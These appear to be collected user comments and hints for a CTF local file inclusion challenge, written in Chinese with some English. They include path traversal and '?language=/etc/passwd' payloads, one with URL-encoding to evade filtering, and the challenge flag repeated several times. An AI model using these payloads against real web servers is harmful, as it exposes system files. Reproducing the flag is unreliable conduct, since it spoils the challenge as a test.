Lfi是本地文件包含 在基本的LFI攻击中,我们可以使用(../)或简单地(/)从目录中直接读取文件的内容,../../../../敲的足够多就能跳转到根目录下../../../../etc/passwd 用到文件包含php伪协议 环境下有Please Select a language of your choice : en/fr ,参数名可能是language 可以在ip+?langu
shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
?language=/etc/passwd
shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
环境一直打不开 一直在加载
shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
http:\\url:port\?language=/etc/%70%61%73%73%77%64 %70%61%73%73%77%64为passwd的url编码。
shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
use the language parameter 使用language当参数 ?language=/etc/passwd